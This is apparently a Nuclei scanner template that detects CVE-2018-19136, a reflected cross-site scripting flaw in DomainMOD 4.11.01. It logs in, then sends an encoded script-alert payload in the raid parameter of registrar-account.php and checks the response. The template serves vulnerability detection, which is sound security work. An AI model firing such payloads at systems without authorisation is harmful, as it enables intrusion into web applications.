id: CVE-2018-19136 info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | DomainMOD 4.11.01 is vulnerable to Reflected Cross Site Scripting (rXSS) via assets/edit/registrar-account.php. reference: - https://www.exploit-db.com/exploits/45883/ - https://nvd.nist.gov/vuln/detail/CVE-2018-19136 - https://github.com/domainmod/domainmod/issues/79 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-19136 cwe-id: CWE-79 metadata: verified: "true" tags: cve,cve2018,domainmod,xss,authenticated requests: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded new_username={{username}}&new_password={{password}} - | GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '">&really_del=1">YES' - type: word part: header words: - text/html - type: status status: - 200